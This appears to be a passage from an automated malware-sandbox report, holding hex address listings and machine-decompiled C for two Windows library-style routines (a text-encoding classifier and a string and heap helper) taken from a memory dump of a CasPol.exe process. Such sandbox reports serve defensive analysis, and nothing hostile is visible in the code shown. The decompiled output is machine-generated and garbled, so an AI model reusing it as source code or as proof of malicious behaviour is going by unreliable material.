                                                                0x0163b38c
                                                                0x0163b38e
                                                                0x0168a7bd
                                                                0x0163b394
                                                                0x0163b394
                                                                0x0163b394
                                                                0x0163b39b
                                                                0x0163b39e
                                                                0x00000000
                                                                0x0163b39e
                                                                0x0163b386
                                                                0x0163b256
                                                                0x0163b258
                                                                0x0168a7c6
                                                                0x0168a7cc
                                                                0x0168a7cc
                                                                0x0168a7c6
                                                                0x0163b261
                                                                0x0163b266
                                                                0x0163b26a
                                                                0x0168a7d3
                                                                0x0168a7d3
                                                                0x0163b273
                                                                0x0163b278
                                                                0x0163b27a
                                                                0x0163b27a
                                                                0x0163b281
                                                                0x0163b283
                                                                0x0163b285
                                                                0x0163b287
                                                                0x0163b289
                                                                0x00000000
                                                                0x0163b289
                                                                0x0163b248
                                                                0x0168a757
                                                                0x0168a757
                                                                0x0163b1f6
                                                                0x00000000
                                                                0x00000000
                                                                0x0163b1fc
                                                                0x0163b201
                                                                0x0168a760
                                                                0x0168a766
                                                                0x0168a766
                                                                0x0168a760
                                                                0x0163b209
                                                                0x0163b3a8
                                                                0x0168a76f
                                                                0x0163b3ae
                                                                0x0163b3ae
                                                                0x0163b3ae
                                                                0x0163b3b0
                                                                0x00000000
                                                                0x0163b20f
                                                                0x0163b20f
                                                                0x0163b213
                                                                0x0168a778
                                                                0x0168a77e
                                                                0x0168a77e
                                                                0x0168a778
                                                                0x0163b21b
                                                                0x00000000
                                                                0x0163b221
                                                                0x0163b223
                                                                0x0168a787
                                                                0x0163b229
                                                                0x0163b229
                                                                0x0163b229
                                                                0x0163b22b
                                                                0x00000000
                                                                0x0163b22b
                                                                0x0163b21b
                                                                0x0163b209
                                                                0x0163b1db
                                                                0x0163b142
                                                                0x0163b142
                                                                0x0163b146
                                                                0x0163b148
                                                                0x0163b14c
                                                                0x0163b14f
                                                                0x0163b154
                                                                0x0163b15b
                                                                0x0168a6b4
                                                                0x00000000
                                                                0x00000000
                                                                0x0168a6ba
                                                                0x0168a6ba
                                                                0x0163b163
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0163b163
                                                                0x0163b13a
                                                                0x0163b169
                                                                0x0163b16b
                                                                0x0163b16e
                                                                0x0163b171
                                                                0x0163b175
                                                                0x0163b178
                                                                0x0168a6c3
                                                                0x0168a6c9
                                                                0x0168a6c9
                                                                0x0168a6c3
                                                                0x0163b180
                                                                0x0163b184
                                                                0x00000000
                                                                0x0163b104
                                                                0x0163b0f6

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0ec6c5e2d367d18b84ee964be1aa1d3b822183ad02e3793e91df51d62079f2cb
                                                                • Instruction ID: 70dd5c5680df6819c4c0a751508f42bf8cfd4dc825756a3dc412a970522a539a
                                                                • Opcode Fuzzy Hash: 0ec6c5e2d367d18b84ee964be1aa1d3b822183ad02e3793e91df51d62079f2cb
                                                                • Instruction Fuzzy Hash: A2D1E335B143168BEB22CE6DCD8037ABBE1AFC5354B28C269DC65CB346E771D8429750
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 99%
                                                                			E01620D20(signed short* _a4, signed char _a8, unsigned int _a12) {
                                                                				signed char _v5;
                                                                				signed int _v12;
                                                                				signed int _v16;
                                                                				signed int _v20;
                                                                				signed int _v24;
                                                                				signed int _v28;
                                                                				signed int _v32;
                                                                				unsigned int _v36;
                                                                				signed char _v40;
                                                                				intOrPtr _v44;
                                                                				intOrPtr _v48;
                                                                				intOrPtr _v52;
                                                                				intOrPtr _v56;
                                                                				intOrPtr _v60;
                                                                				intOrPtr _v64;
                                                                				intOrPtr _v68;
                                                                				intOrPtr _v72;
                                                                				intOrPtr _v76;
                                                                				signed int _v80;
                                                                				signed int _v84;
                                                                				intOrPtr _v88;
                                                                				intOrPtr _v92;
                                                                				signed int _v96;
                                                                				unsigned int _v100;
                                                                				signed int _t159;
                                                                				unsigned int _t160;
                                                                				signed int _t162;
                                                                				unsigned int _t163;
                                                                				signed int _t180;
                                                                				signed int _t192;
                                                                				signed int _t193;
                                                                				unsigned int _t194;
                                                                				signed char _t196;
                                                                				signed int _t197;
                                                                				signed char _t198;
                                                                				signed char _t199;
                                                                				unsigned int _t200;
                                                                				unsigned int _t202;
                                                                				unsigned int _t204;
                                                                				unsigned int _t205;
                                                                				unsigned int _t209;
                                                                				signed int _t210;
                                                                				signed int _t211;
                                                                				unsigned int _t212;
                                                                				signed char _t213;
                                                                				signed short* _t214;
                                                                				intOrPtr _t215;
                                                                				signed int _t216;
                                                                				signed int _t217;
                                                                				unsigned int _t218;
                                                                				signed int _t220;
                                                                				signed int _t221;
                                                                				signed short _t223;
                                                                				signed char _t224;
                                                                				signed int _t229;
                                                                				signed int _t231;
                                                                				unsigned int _t233;
                                                                				unsigned int _t237;
                                                                				signed int _t238;
                                                                				unsigned int _t239;
                                                                				signed int _t240;
                                                                				signed int _t254;
                                                                				signed int _t255;
                                                                				signed int _t256;
                                                                				signed int _t257;
                                                                				unsigned int _t258;
                                                                				void* _t261;
                                                                
                                                                				_t213 = _a8;
                                                                				_t159 = 0;
                                                                				_v60 = 0;
                                                                				_t237 = _t213 >> 1;
                                                                				_t210 = 0;
                                                                				_t257 = 0;
                                                                				_v56 = 0;
                                                                				_v52 = 0;
                                                                				_v44 = 0;
                                                                				_v48 = 0;
                                                                				_v92 = 0;
                                                                				_v88 = 0;
                                                                				_v76 = 0;
                                                                				_v72 = 0;
                                                                				_v64 = 0;
                                                                				_v68 = 0;
                                                                				_v24 = 0;
                                                                				_v80 = 0;
                                                                				_v84 = 0;
                                                                				_v28 = 0;
                                                                				_v32 = 0;
                                                                				_v20 = 0;
                                                                				_v12 = 0;
                                                                				_v16 = 0;
                                                                				_v100 = _t237;
                                                                				if(_t237 > 0x100) {
                                                                					_t254 = 0x100;
                                                                					_v36 = 0x100;
                                                                					L2:
                                                                					_t261 = _t213 - 2;
                                                                					if(_t261 == 0) {
                                                                						_t214 = _a4;
                                                                						_t160 =  *_t214 & 0x0000ffff;
                                                                						__eflags = _t160;
                                                                						if(_t160 == 0) {
                                                                							L108:
                                                                							_t159 = 0;
                                                                							L8:
                                                                							_t238 = 0;
                                                                							_v96 = 0;
                                                                							if(_t254 == 0) {
                                                                								L30:
                                                                								_v24 = _t159 - 1;
                                                                								goto L31;
                                                                							} else {
                                                                								goto L11;
                                                                								L13:
                                                                								_t224 = _t223 >> 8;
                                                                								_v40 = _t224;
                                                                								_t256 = _t224 & 0x000000ff;
                                                                								_t196 = _a4[_t238];
                                                                								_v5 = _t196;
                                                                								_t197 = _t196 & 0x000000ff;
                                                                								if(_t197 == 0xd) {
                                                                									__eflags = _t257 - 0xa;
                                                                									if(_t257 == 0xa) {
                                                                										_v12 = _v12 + 1;
                                                                									}
                                                                								} else {
                                                                									if(_t197 == 0xa) {
                                                                										__eflags = _t257 - 0xd;
                                                                										if(_t257 == 0xd) {
                                                                											_v12 = _v12 + 1;
                                                                										}
                                                                									}
                                                                								}
                                                                								_v24 = (0 | _t256 == 0x00000000) + _v24 + (0 | _t197 == 0x00000000);
                                                                								if(_t256 > _t257) {
                                                                									_t229 = _t256;
                                                                								} else {
                                                                									_t229 = _t257;
                                                                								}
                                                                								if(_t257 >= _t256) {
                                                                									_t257 = _t256;
                                                                								}
                                                                								_v28 = _v28 + _t229 - _t257;
                                                                								_t231 = _t197;
                                                                								if(_t197 <= _t210) {
                                                                									_t231 = _t210;
                                                                								}
                                                                								if(_t210 >= _t197) {
                                                                									_t210 = _t197;
                                                                								}
                                                                								_v32 = _v32 + _t231 - _t210;
                                                                								_t238 = _v96 + 1;
                                                                								_t210 = _t197;
                                                                								_t257 = _t256;
                                                                								_v96 = _t238;
                                                                								if(_t238 < _v36) {
                                                                									_t214 = _a4;
                                                                									L11:
                                                                									_t223 = _t214[_t238] & 0x0000ffff;
                                                                									_t193 = _t223 & 0x0000ffff;
                                                                									if(_t193 >= 0x900 || _t193 < 0x21) {
                                                                										goto L58;
                                                                									} else {
                                                                										goto L13;
                                                                									}
                                                                								}
                                                                								_t198 = _v5;
                                                                								if(_t198 == 0xd) {
                                                                									_t199 = _v40;
                                                                									__eflags = _t199 - 0xa;
                                                                									if(_t199 != 0xa) {
                                                                										L27:
                                                                										_t233 = _v12;
                                                                										L28:
                                                                										if(_t199 != 0) {
                                                                											__eflags = _t199 - 0x1a;
                                                                											if(_t199 == 0x1a) {
                                                                												_v12 = _t233 + 1;
                                                                											}
                                                                											L31:
                                                                											_t162 = _a8;
                                                                											if(_t162 > 0x200) {
                                                                												_t255 = 0x200;
                                                                											} else {
                                                                												_t255 = _t162;
                                                                											}
                                                                											_t215 =  *0x1716d59; // 0x0
                                                                											if(_t215 != 0) {
                                                                												_t239 = 0;
                                                                												__eflags = _t255;
                                                                												if(_t255 == 0) {
                                                                													goto L34;
                                                                												} else {
                                                                													goto L119;
                                                                												}
                                                                												do {
                                                                													L119:
                                                                													_t192 =  *(_a4 + _t239) & 0x000000ff;
                                                                													__eflags =  *((short*)(0x1716920 + _t192 * 2));
                                                                													_t163 = _v20;
                                                                													if( *((short*)(0x1716920 + _t192 * 2)) != 0) {
                                                                														_t163 = _t163 + 1;
                                                                														_t239 = _t239 + 1;
                                                                														__eflags = _t239;
                                                                														_v20 = _t163;
                                                                													}
                                                                													_t239 = _t239 + 1;
                                                                													__eflags = _t239 - _t255;
                                                                												} while (_t239 < _t255);
                                                                												goto L35;
                                                                											} else {
                                                                												L34:
                                                                												_t163 = 0;
                                                                												L35:
                                                                												_t240 = _v32;
                                                                												_t211 = _v28;
                                                                												if(_t240 < 0x7f) {
                                                                													__eflags = _t211;
                                                                													if(_t211 != 0) {
                                                                														L37:
                                                                														if(_t240 == 0) {
                                                                															_v16 = 0x10;
                                                                														}
                                                                														L38:
                                                                														_t258 = _a12;
                                                                														if(_t215 != 0) {
                                                                															__eflags = _t163;
                                                                															if(_t163 == 0) {
                                                                																goto L39;
                                                                															}
                                                                															__eflags = _t258;
                                                                															if(_t258 == 0) {
                                                                																goto L39;
                                                                															}
                                                                															__eflags =  *_t258 & 0x00000400;
                                                                															if(( *_t258 & 0x00000400) == 0) {
                                                                																goto L39;
                                                                															}
                                                                															_t218 = _v100;
                                                                															__eflags = _t218 - 0x100;
                                                                															if(_t218 > 0x100) {
                                                                																_t218 = 0x100;
                                                                															}
                                                                															_t220 = (_t218 >> 1) - 1;
                                                                															__eflags = _v20 - 0xaaaaaaab * _t220 >> 0x20 >> 1;
                                                                															if(_v20 >= 0xaaaaaaab * _t220 >> 0x20 >> 1) {
                                                                																_t221 = _t220 + _t220;
                                                                																__eflags = _v20 - 0xaaaaaaab * _t221 >> 0x20 >> 1;
                                                                																asm("sbb ecx, ecx");
                                                                																_t216 =  ~_t221 + 1;
                                                                																__eflags = _t216;
                                                                															} else {
                                                                																_t216 = 3;
                                                                															}
                                                                															_v16 = _v16 | 0x00000400;
                                                                															_t240 = _v32;
                                                                															L40:
                                                                															if(_t211 * _t216 < _t240) {
                                                                																_v16 = _v16 | 0x00000002;
                                                                															}
                                                                															_t217 = _v16;
                                                                															if(_t240 * _t216 < _t211) {
                                                                																_t217 = _t217 | 0x00000020;
                                                                															}
                                                                															if(_v44 + _v48 + _v52 + _v56 + _v60 != 0) {
                                                                																_t217 = _t217 | 0x00000004;
                                                                															}
                                                                															if(_v64 + _v68 + _v72 + _v76 != 0) {
                                                                																_t217 = _t217 | 0x00000040;
                                                                															}
                                                                															if(_v80 + _v84 + _v88 + _v92 == 0) {
                                                                																_t212 = _v12;
                                                                																__eflags = _t212;
                                                                																if(_t212 == 0) {
                                                                																	goto L48;
                                                                																}
                                                                																__eflags = _t212 - 0xcccccccd * _t255 >> 0x20 >> 5;
                                                                																if(_t212 >= 0xcccccccd * _t255 >> 0x20 >> 5) {
                                                                																	goto L47;
                                                                																}
                                                                																goto L48;
                                                                															} else {
                                                                																L47:
                                                                																_t217 = _t217 | 0x00000100;
                                                                																L48:
                                                                																if((_a8 & 0x00000001) != 0) {
                                                                																	_t217 = _t217 | 0x00000200;
                                                                																}
                                                                																if(_v24 != 0) {
                                                                																	_t217 = _t217 | 0x00001000;
                                                                																}
                                                                																_t180 =  *_a4 & 0x0000ffff;
                                                                																if(_t180 != 0xfeff) {
                                                                																	__eflags = _t180 - 0xfffe;
                                                                																	if(_t180 == 0xfffe) {
                                                                																		_t217 = _t217 | 0x00000080;
                                                                																	}
                                                                																} else {
                                                                																	_t217 = _t217 | 0x00000008;
                                                                																}
                                                                																if(_t258 != 0) {
                                                                																	 *_t258 =  *_t258 & _t217;
                                                                																	_t217 =  *_t258;
                                                                																}
                                                                																if((_t217 & 0x00000b08) != 8) {
                                                                																	__eflags = _t217 & 0x000000f0;
                                                                																	if((_t217 & 0x000000f0) != 0) {
                                                                																		L84:
                                                                																		return 0;
                                                                																	}
                                                                																	__eflags = _t217 & 0x00000f00;
                                                                																	if((_t217 & 0x00000f00) == 0) {
                                                                																		__eflags = _t217 & 0x0000f00f;
                                                                																		if((_t217 & 0x0000f00f) == 0) {
                                                                																			goto L84;
                                                                																		}
                                                                																		goto L56;
                                                                																	}
                                                                																	goto L84;
                                                                																} else {
                                                                																	L56:
                                                                																	return 1;
                                                                																}
                                                                															}
                                                                														}
                                                                														L39:
                                                                														_t216 = 3;
                                                                														goto L40;
                                                                													}
                                                                													_v16 = 1;
                                                                													goto L38;
                                                                												}
                                                                												if(_t211 == 0) {
                                                                													goto L38;
                                                                												}
                                                                												goto L37;
                                                                											}
                                                                										} else {
                                                                											_t159 = _v24;
                                                                											goto L30;
                                                                										}
                                                                									}
                                                                									L104:
                                                                									_t233 = _v12 + 1;
                                                                									_v12 = _t233;
                                                                									goto L28;
                                                                								}
                                                                								_t199 = _v40;
                                                                								if(_t198 != 0xa || _t199 != 0xd) {
                                                                									goto L27;
                                                                								} else {
                                                                									goto L104;
                                                                								}
                                                                								L58:
                                                                								__eflags = _t193 - 0x3001;
                                                                								if(_t193 < 0x3001) {
                                                                									L60:
                                                                									__eflags = _t193 - 0xd00;
                                                                									if(__eflags > 0) {
                                                                										__eflags = _t193 - 0x3000;
                                                                										if(__eflags > 0) {
                                                                											_t194 = _t193 - 0xfeff;
                                                                											__eflags = _t194;
                                                                											if(_t194 != 0) {
                                                                												_t200 = _t194 - 0xff;
                                                                												__eflags = _t200;
                                                                												if(_t200 == 0) {
                                                                													_v88 = _v88 + 1;
                                                                												} else {
                                                                													__eflags = _t200 == 1;
                                                                													if(_t200 == 1) {
                                                                														_v92 = _v92 + 1;
                                                                													}
                                                                												}
                                                                											}
                                                                										} else {
                                                                											if(__eflags == 0) {
                                                                												_v48 = _v48 + 1;
                                                                											} else {
                                                                												_t202 = _t193 - 0x2000;
                                                                												__eflags = _t202;
                                                                												if(_t202 == 0) {
                                                                													_v68 = _v68 + 1;
                                                                												}
                                                                											}
                                                                										}
                                                                										goto L13;
                                                                									}
                                                                									if(__eflags == 0) {
                                                                										_v76 = _v76 + 1;
                                                                										goto L13;
                                                                									}
                                                                									__eflags = _t193 - 0x20;
                                                                									if(__eflags > 0) {
                                                                										_t204 = _t193 - 0x900;
                                                                										__eflags = _t204;
                                                                										if(_t204 == 0) {
                                                                											_v64 = _v64 + 1;
                                                                										} else {
                                                                											_t205 = _t204 - 0x100;
                                                                											__eflags = _t205;
                                                                											if(_t205 == 0) {
                                                                												_v72 = _v72 + 1;
                                                                											} else {
                                                                												__eflags = _t205 == 0xd;
                                                                												if(_t205 == 0xd) {
                                                                													_v84 = _v84 + 1;
                                                                												}
                                                                											}
                                                                										}
                                                                										goto L13;
                                                                									}
                                                                									if(__eflags == 0) {
                                                                										_v44 = _v44 + 1;
                                                                										goto L13;
                                                                									}
                                                                									__eflags = _t193 - 0xd;
                                                                									if(_t193 > 0xd) {
                                                                										goto L13;
                                                                									}
                                                                									_t84 = _t193 + 0x1621174; // 0x4040400
                                                                									switch( *((intOrPtr*)(( *_t84 & 0x000000ff) * 4 +  &M01621160))) {
                                                                										case 0:
                                                                											_v80 = _v80 + 1;
                                                                											goto L13;
                                                                										case 1:
                                                                											_v52 = _v52 + 1;
                                                                											goto L13;
                                                                										case 2:
                                                                											_v56 = _v56 + 1;
                                                                											goto L13;
                                                                										case 3:
                                                                											_v60 = _v60 + 1;
                                                                											goto L13;
                                                                										case 4:
                                                                											goto L13;
                                                                									}
                                                                								}
                                                                								__eflags = _t193 - 0xfeff;
                                                                								if(_t193 < 0xfeff) {
                                                                									goto L13;
                                                                								}
                                                                								goto L60;
                                                                							}
                                                                						}
                                                                						__eflags = _t160 >> 8;
                                                                						if(_t160 >> 8 == 0) {
                                                                							L101:
                                                                							_t209 = _a12;
                                                                							__eflags = _t209;
                                                                							if(_t209 != 0) {
                                                                								 *_t209 = 5;
                                                                							}
                                                                							goto L84;
                                                                						}
                                                                						goto L108;
                                                                					}
                                                                					if(_t261 <= 0 || _t237 > 0x100) {
                                                                						_t214 = _a4;
                                                                					} else {
                                                                						_t214 = _a4;
                                                                						if((_t213 & 0x00000001) == 0 && ( *(_t214 + _t254 * 2 - 2) & 0x0000ff00) == 0) {
                                                                							_t254 = _t254 - 1;
                                                                							_v36 = _t254;
                                                                						}
                                                                					}
                                                                					goto L8;
                                                                				}
                                                                				_t254 = _t237;
                                                                				_v36 = _t254;
                                                                				if(_t254 == 0) {
                                                                					goto L101;
                                                                				}
                                                                				goto L2;
                                                                			}
                                                                0x0167ea2d
                                                                0x0167ea2f
                                                                0x0167ea31
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0167ea37
                                                                0x0167ea37
                                                                0x0167ea3a
                                                                0x0167ea3e
                                                                0x0167ea47
                                                                0x0167ea4a
                                                                0x0167ea4c
                                                                0x0167ea4d
                                                                0x0167ea4d
                                                                0x0167ea4e
                                                                0x0167ea4e
                                                                0x0167ea51
                                                                0x0167ea52
                                                                0x0167ea52
                                                                0x00000000
                                                                0x01620ee1
                                                                0x01620ee1
                                                                0x01620ee1
                                                                0x01620ee3
                                                                0x01620ee3
                                                                0x01620ee6
                                                                0x01620eec
                                                                0x0167ea5b
                                                                0x0167ea5d
                                                                0x01620ef6
                                                                0x01620ef8
                                                                0x0167ea6f
                                                                0x0167ea6f
                                                                0x01620efe
                                                                0x01620efe
                                                                0x01620f03
                                                                0x0167ea7b
                                                                0x0167ea7d
                                                                0x00000000
                                                                0x00000000
                                                                0x0167ea83
                                                                0x0167ea85
                                                                0x00000000
                                                                0x00000000
                                                                0x0167ea8b
                                                                0x0167ea91
                                                                0x00000000
                                                                0x00000000
                                                                0x0167ea97
                                                                0x0167ea9a
                                                                0x0167eaa0
                                                                0x0167eaa2
                                                                0x0167eaa2
                                                                0x0167eaae
                                                                0x0167eab3
                                                                0x0167eab6
                                                                0x0167eabf
                                                                0x0167eaca
                                                                0x0167eacd
                                                                0x0167ead1
                                                                0x0167ead1
                                                                0x0167eab8
                                                                0x0167eab8
                                                                0x0167eab8
                                                                0x0167ead2
                                                                0x0167ead9
                                                                0x01620f0e
                                                                0x01620f15
                                                                0x01620f17
                                                                0x01620f17
                                                                0x01620f1e
                                                                0x01620f23
                                                                0x0167eae1
                                                                0x0167eae1
                                                                0x01620f38
                                                                0x01620f3a
                                                                0x01620f3a
                                                                0x01620f49
                                                                0x01621108
                                                                0x01621108
                                                                0x01620f5b
                                                                0x016210c7
                                                                0x016210ca
                                                                0x016210cc
                                                                0x00000000
                                                                0x00000000
                                                                0x016210dc
                                                                0x016210de
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x01620f61
                                                                0x01620f61
                                                                0x01620f61
                                                                0x01620f67
                                                                0x01620f6b
                                                                0x0162111d
                                                                0x0162111d
                                                                0x01620f75
                                                                0x01620f77
                                                                0x01620f77
                                                                0x01620f85
                                                                0x01620f8b
                                                                0x016210b9
                                                                0x016210bc
                                                                0x0167eae9
                                                                0x0167eae9
                                                                0x01620f91
                                                                0x01620f91
                                                                0x01620f91
                                                                0x01620f96
                                                                0x01620f98
                                                                0x01620f9a
                                                                0x01620f9a
                                                                0x01620fa6
                                                                0x0162107c
                                                                0x0162107f
                                                                0x0162108d
                                                                0x00000000
                                                                0x0162108d
                                                                0x01621081
                                                                0x01621087
                                                                0x0167eaf4
                                                                0x0167eafa
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0167eb00
                                                                0x00000000
                                                                0x01620fac
                                                                0x01620fac
                                                                0x00000000
                                                                0x01620fac
                                                                0x01620fa6
                                                                0x01620f5b
                                                                0x01620f09
                                                                0x01620f09
                                                                0x00000000
                                                                0x01620f09
                                                                0x0167ea63
                                                                0x00000000
                                                                0x0167ea63
                                                                0x01620ef4
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x01620ef4
                                                                0x01620ebc
                                                                0x01620ebc
                                                                0x00000000
                                                                0x01620ebc
                                                                0x01620eb6
                                                                0x01621149
                                                                0x0162114c
                                                                0x0162114d
                                                                0x00000000
                                                                0x0162114d
                                                                0x01620ea4
                                                                0x01620ea7
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x01620fb7
                                                                0x01620fb7
                                                                0x01620fbc
                                                                0x01620fc9
                                                                0x01620fc9
                                                                0x01620fce
                                                                0x01621020
                                                                0x01621025
                                                                0x01621094
                                                                0x01621094
                                                                0x01621099
                                                                0x0167ea04
                                                                0x0167ea04
                                                                0x0167ea09
                                                                0x0167ea1c
                                                                0x0167ea0b
                                                                0x0167ea0b
                                                                0x0167ea0e
                                                                0x0167ea14
                                                                0x0167ea14
                                                                0x0167ea0e
                                                                0x0167ea09
                                                                0x01621027
                                                                0x01621027
                                                                0x01621155
                                                                0x0162102d
                                                                0x0162102d
                                                                0x0162102d
                                                                0x01621032
                                                                0x0167e9fc
                                                                0x0167e9fc
                                                                0x01621032
                                                                0x01621027
                                                                0x00000000
                                                                0x01621025
                                                                0x01620fd0
                                                                0x0167e9f4
                                                                0x00000000
                                                                0x0167e9f4
                                                                0x01620fd6
                                                                0x01620fd9
                                                                0x01621059
                                                                0x01621059
                                                                0x0162105e
                                                                0x0167e9ec
                                                                0x01621064
                                                                0x01621064
                                                                0x01621064
                                                                0x01621069
                                                                0x016210ac
                                                                0x0162106b
                                                                0x0162106b
                                                                0x0162106e
                                                                0x01621074
                                                                0x01621074
                                                                0x0162106e
                                                                0x01621069
                                                                0x00000000
                                                                0x0162105e
                                                                0x01620fdb
                                                                0x016210a4
                                                                0x00000000
                                                                0x016210a4
                                                                0x01620fe1
                                                                0x01620fe4
                                                                0x00000000
                                                                0x00000000
                                                                0x01620fea
                                                                0x01620ff1
                                                                0x00000000
                                                                0x01620ff8
                                                                0x00000000
                                                                0x00000000
                                                                0x0167e9e4
                                                                0x00000000
                                                                0x00000000
                                                                0x01621018
                                                                0x00000000
                                                                0x00000000
                                                                0x01621051
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x01620ff1
                                                                0x01620fbe
                                                                0x01620fc3
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x01620fc3
                                                                0x01620df3
                                                                0x0167e9d5
                                                                0x0167e9d7
                                                                0x01621128
                                                                0x01621128
                                                                0x0162112b
                                                                0x0162112d
                                                                0x01621133
                                                                0x01621133
                                                                0x00000000
                                                                0x0162112d
                                                                0x00000000
                                                                0x0167e9d7
                                                                0x01620dc2
                                                                0x016210f6
                                                                0x01620dd4
                                                                0x01620dd7
                                                                0x01620dda
                                                                0x01620de8
                                                                0x01620de9
                                                                0x01620de9
                                                                0x01620dda
                                                                0x00000000
                                                                0x01620dc2
                                                                0x01620dac
                                                                0x01620dae
                                                                0x01620db3
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ed672bea518987d309454d04cc339cdc3f7c6f053da6ad8e806ce6cad1207640
                                                                • Instruction ID: 16741bb5e3683242d2076b63dd420d1b2fc66a51007bed9ab927ee4ccea43af9
                                                                • Opcode Fuzzy Hash: ed672bea518987d309454d04cc339cdc3f7c6f053da6ad8e806ce6cad1207640
                                                                • Instruction Fuzzy Hash: 9AD1B431E04A698BEB28CF9CCC957BDBBB1FB45300F148029E946A7385D7798986CF41
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 87%
                                                                			E0163D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
                                                                				signed int _v8;
                                                                				intOrPtr _v20;
                                                                				signed int _v36;
                                                                				intOrPtr* _v40;
                                                                				signed int _v44;
                                                                				signed int _v48;
                                                                				signed char _v52;
                                                                				signed int _v60;
                                                                				signed int _v64;
                                                                				signed int _v68;
                                                                				signed int _v72;
                                                                				signed int _v76;
                                                                				intOrPtr _v80;
                                                                				signed int _v84;
                                                                				intOrPtr _v100;
                                                                				intOrPtr _v104;
                                                                				signed int _v108;
                                                                				signed int _v112;
                                                                				signed int _v116;
                                                                				intOrPtr _v120;
                                                                				signed int _v132;
                                                                				char _v140;
                                                                				char _v144;
                                                                				char _v157;
                                                                				signed int _v164;
                                                                				signed int _v168;
                                                                				signed int _v169;
                                                                				intOrPtr _v176;
                                                                				signed int _v180;
                                                                				signed int _v184;
                                                                				intOrPtr _v188;
                                                                				signed int _v192;
                                                                				signed int _v200;
                                                                				signed int _v208;
                                                                				intOrPtr* _v212;
                                                                				char _v216;
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				void* __esi;
                                                                				void* __ebp;
                                                                				signed int _t204;
                                                                				void* _t208;
                                                                				signed int _t211;
                                                                				signed int _t216;
                                                                				intOrPtr _t217;
                                                                				intOrPtr* _t218;
                                                                				signed int _t226;
                                                                				signed int _t239;
                                                                				signed int* _t247;
                                                                				signed int _t249;
                                                                				void* _t252;
                                                                				signed int _t256;
                                                                				signed int _t269;
                                                                				signed int _t271;
                                                                				signed int _t277;
                                                                				signed int _t279;
                                                                				intOrPtr _t283;
                                                                				signed int _t287;
                                                                				signed int _t288;
                                                                				void* _t289;
                                                                				signed char _t290;
                                                                				signed int _t292;
                                                                				signed int* _t293;
                                                                				signed int _t306;
                                                                				signed int _t307;
                                                                				signed int _t308;
                                                                				signed int _t309;
                                                                				signed int _t310;
                                                                				intOrPtr _t311;
                                                                				intOrPtr _t312;
                                                                				signed int _t319;
                                                                				signed int _t320;
                                                                				signed int* _t324;
                                                                				signed int _t337;
                                                                				signed int _t338;
                                                                				signed int _t339;
                                                                				signed int* _t340;
                                                                				void* _t341;
                                                                				signed int _t344;
                                                                				signed int _t348;
                                                                				signed int _t349;
                                                                				signed int _t351;
                                                                				intOrPtr _t353;
                                                                				void* _t354;
                                                                				signed int _t356;
                                                                				signed int _t358;
                                                                				intOrPtr _t359;
                                                                				signed int _t363;
                                                                				signed short* _t365;
                                                                				void* _t367;
                                                                				intOrPtr _t369;
                                                                				void* _t370;
                                                                				signed int _t371;
                                                                				signed int _t372;
                                                                				void* _t374;
                                                                				signed int _t376;
                                                                				void* _t384;
                                                                				signed int _t387;
                                                                
                                                                				_v8 =  *0x171d360 ^ _t376;
                                                                				_t2 =  &_a20;
                                                                				 *_t2 = _a20 & 0x00000001;
                                                                				_t287 = _a4;
                                                                				_v200 = _a12;
                                                                				_t365 = _a8;
                                                                				_v212 = _a16;
                                                                				_v180 = _a24;
                                                                				_v168 = 0;
                                                                				_v157 = 0;
                                                                				if( *_t2 != 0) {
                                                                					__eflags = E01636600(0x17152d8);
                                                                					if(__eflags == 0) {
                                                                						goto L1;
                                                                					} else {
                                                                						_v188 = 6;
                                                                					}
                                                                				} else {
                                                                					L1:
                                                                					_v188 = 9;
                                                                				}
                                                                				if(_t365 == 0) {
                                                                					_v164 = 0;
                                                                					goto L5;
                                                                				} else {
                                                                					_t363 =  *_t365 & 0x0000ffff;
                                                                					_t341 = _t363 + 1;
                                                                					if((_t365[1] & 0x0000ffff) < _t341) {
                                                                						L109:
                                                                						__eflags = _t341 - 0x80;
                                                                						if(_t341 <= 0x80) {
                                                                							_t281 =  &_v140;
                                                                							_v164 =  &_v140;
                                                                							goto L114;
                                                                						} else {
                                                                							_t283 =  *0x1717b9c; // 0x0
                                                                							_t281 = L01644620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
                                                                							_v164 = _t281;
                                                                							__eflags = _t281;
                                                                							if(_t281 != 0) {
                                                                								_v157 = 1;
                                                                								L114:
                                                                								E0166F3E0(_t281, _t365[2], _t363);
                                                                								_t200 = _v164;
                                                                								 *((char*)(_v164 + _t363)) = 0;
                                                                								goto L5;
                                                                							} else {
                                                                								_t204 = 0xc000009a;
                                                                								goto L47;
                                                                							}
                                                                						}
                                                                					} else {
                                                                						_t200 = _t365[2];
                                                                						_v164 = _t200;
                                                                						if( *((char*)(_t200 + _t363)) != 0) {
                                                                							goto L109;
                                                                						} else {
                                                                							while(1) {
                                                                								L5:
                                                                								_t353 = 0;
                                                                								_t342 = 0x1000;
                                                                								_v176 = 0;
                                                                								if(_t287 == 0) {
                                                                									break;
